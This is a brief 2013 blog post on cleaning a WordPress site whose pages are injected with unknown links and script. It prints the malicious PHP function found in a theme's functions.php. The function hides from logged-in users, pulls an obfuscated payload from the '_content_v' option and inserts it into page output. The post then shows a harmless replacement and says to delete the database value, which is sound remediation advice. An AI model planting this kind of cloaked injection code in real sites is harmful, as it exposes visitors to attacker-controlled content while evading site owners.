WordPress getting injected with unknown script after body tag


Oct 31, 2013    Janaki Mahapatra, More

Here is the example of script virus. It added a different type of links after the body tag. Also added a java script just before the closing </head> tag. [caption id="attachment_678" align="alignnone" width="300"]WordPress injected by unknown script WordPress injected by unknown script[/caption] The process to remove the issue
  • check your functions.php in your theme folder.
  • Check the below function, if found then replace it as I explained here
    function b_goes($p) {
    if (!defined('wp_m1'))
    {
    if (isset($_COOKIE['wordpress_test_cookie']) || isset($_COOKIE['wp-settings-1']) ||
    isset($_COOKIE['wp-settings-time-1']) || (function_exists('is_user_logged_in') &&
    is_user_logged_in()) || (!$m = get_option('_content_v'))) {
    return $p;
    }
    list($m, $n) = @unserialize(trim(strrev($m)));
    define('wp_m1', $m);
    define('wp_n1', $n);
    }
    
    if (!stripos($p, wp_n1)) $p = preg_replace("~]*>~i", "$0\n".wp_n1, $p, 1);
    if (!stripos($p, wp_m1)) $p = preg_replace("~~", wp_m1."\n", $p, 1);
    if (!stripos($p, wp_n1)) $p = preg_replace("~
~", "
\n".wp_n1, $p, 1); if (!stripos($p, wp_m1)) $p = preg_replace("~
~", wp_m1."\n", $p, 1); return $p; } //Replace the function function b_goes($p) { return $p; } As you noticed
get_option('_content_v') means there is a field '_content_v' 
in wp_options table. 
You have the delete or update the value from database.
Let me know If it helps you.